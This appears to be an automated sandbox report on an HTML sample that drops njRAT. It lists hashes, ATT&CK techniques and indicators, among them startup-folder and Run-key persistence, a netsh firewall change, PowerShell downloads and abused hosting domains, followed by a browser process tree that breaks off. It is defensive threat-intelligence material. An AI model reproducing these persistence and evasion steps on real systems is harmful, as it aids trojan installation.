njrat | 6643f151aed8a65e60aafdd8ed1df99f4142b3cf4ac8f4f2ef41eb88070b13d8

max time kernel
300s
max time network
295s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
23-09-2024 20:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sample.html
Size

12KB
MD5

0b12663e5ae87a93a8726d938ef5bbf8
SHA1

b53628d0d6db63fc3628146e901fa2ddca94b46d
SHA256

6643f151aed8a65e60aafdd8ed1df99f4142b3cf4ac8f4f2ef41eb88070b13d8
SHA512

9c3d34c587154bad94db1e4084f90f4d6415b7d8869293b74ab1cafb70021a12463fd1f1909ac06ed7407b062fcad33212769f018710081c9729417c59bb7f70
SSDEEP

192:/NX6Gj50qTgymlrU4yD8Idlueh0ng61u+NmRmE5lw23WXX:/mzlrUhD8Idlu2SgT5u2w

Score

10^/10

njrat discovery evasion execution persistence privilege_escalation trojan

Malware Config

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
285	3976	powershell.exe
287	3976	powershell.exe
290	5316	powershell.exe
291	5316	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
5316	powershell.exe
3976	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5908	netsh.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:SmartScreen:$DATA	NJRat.exe

Executes dropped EXE 5 IoCs

pid	Process
852	NJRat.exe
5964	NJRat.exe
5100	NJRat (1).exe
1112	NJRat (1).exe
3936	robux.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .."	NJRat.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
217	discord.com
218	discord.com
281	raw.githubusercontent.com
99	raw.githubusercontent.com
104	raw.githubusercontent.com
105	raw.githubusercontent.com
216	discord.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NJRat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NJRat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NJRat (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NJRat (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	robux.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5580	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-945322488-2060912225-3527527000-1000\{E265D367-6156-41EA-A0C1-326048848BFC}	msedge.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 966899.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 291870.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 424052.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 852473.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 938266.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2260	msedge.exe
2260	msedge.exe
2524	msedge.exe
2524	msedge.exe
2156	identity_helper.exe
2156	identity_helper.exe
2584	msedge.exe
2584	msedge.exe
5536	msedge.exe
5536	msedge.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe
852	NJRat.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
852	NJRat.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 32 IoCs

pid	Process
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	852	NJRat.exe
Token: SeDebugPrivilege	5964	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: SeDebugPrivilege	5100	NJRat (1).exe
Token: SeDebugPrivilege	1112	NJRat (1).exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: SeDebugPrivilege	3064	firefox.exe
Token: SeDebugPrivilege	3064	firefox.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	3076	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3076	AUDIODG.EXE
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: SeDebugPrivilege	3976	powershell.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: SeDebugPrivilege	5316	powershell.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe
Token: 33	852	NJRat.exe
Token: SeIncBasePriorityPrivilege	852	NJRat.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
2524	msedge.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
3064	firefox.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe
5976	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3064	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2524 wrote to memory of 4820	2524	msedge.exe	82
PID 2524 wrote to memory of 4820	2524	msedge.exe	82
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 940	2524	msedge.exe	84
PID 2524 wrote to memory of 2260	2524	msedge.exe	85
PID 2524 wrote to memory of 2260	2524	msedge.exe	85
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86
PID 2524 wrote to memory of 544	2524	msedge.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\sample.html
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb50146f8,0x7ffbb5014708,0x7ffbb5014718
  2⤵
  PID:4820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
  2⤵
  PID:940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
  2⤵
  PID:544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
  2⤵
  PID:3776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:952
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
  2⤵
  PID:1656
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
  2⤵
  PID:1492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
  2⤵
  PID:4400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
  2⤵
  PID:3928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
  2⤵
  PID:1284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
  2⤵
  PID:2792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
  2⤵
  PID:3572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1
  2⤵
  PID:4484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
  2⤵
  PID:464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
  2⤵
  PID:2000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1
  2⤵
  PID:2344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
